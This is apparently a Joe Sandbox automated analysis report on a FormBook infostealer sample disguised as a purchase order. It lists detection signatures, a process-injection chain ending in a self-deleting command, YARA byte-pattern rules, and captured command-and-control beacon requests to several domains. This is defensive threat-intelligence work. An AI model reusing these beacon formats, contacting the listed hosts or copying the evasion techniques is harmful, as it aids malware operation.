Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:Purchase Order 40,7045$.exe
Analysis ID:321097
MD5:4142c1713da2f4f94bec71bfed46587b
SHA1:06cc7bd53758a0936f4b674847411a4f912fd654
SHA256:fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16089:$sqlite3step: 68 34 1C 7B E1
        • 0x1619c:$sqlite3step: 68 34 1C 7B E1
        • 0x160b8:$sqlite3text: 68 38 2A 90 C5
        • 0x161dd:$sqlite3text: 68 38 2A 90 C5
        • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Purchase Order 40,7045$.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%Perma Link
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase Order 40,7045$.exeJoe Sandbox ML: detected
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 185.201.11.126 185.201.11.126
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.handsfreedocs.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 10:07:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://yuyabo.com/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
